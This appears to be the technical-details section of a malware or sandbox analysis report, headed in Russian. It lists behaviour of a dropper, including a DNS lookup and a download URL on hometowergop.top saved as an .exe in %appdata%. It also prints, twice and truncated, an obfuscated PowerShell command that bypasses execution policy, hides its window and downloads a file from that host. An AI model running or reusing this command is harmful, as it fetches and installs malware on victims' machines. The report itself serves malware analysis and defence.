Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWers^HE^L^l.ex^E ^-execUtIONp^OLic^y^ bypass^ -^N^oprof^ILe -w^i^n^D^owStYLE Hid^DEn^ ^(nEW-ObjE^Ct sYS^tEm.ne^t.^wEbcLI^e^nt).^DOWn^LOADfI^l^e(^'http://hometowergop.top/re...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "poWers^HE^L^l.ex^E ^-execUtIONp^OLic^y^ bypass^ -^N^oprof^ILe -w^i^n^D^owStYLE Hid^DEn^ ^(nEW-ObjE^Ct sYS^tEm.ne^t.^wEbcLI^e^nt).^DOWn^LOADfI^l^e(^'http://hometowergop.top/re...' (со скрытым окном)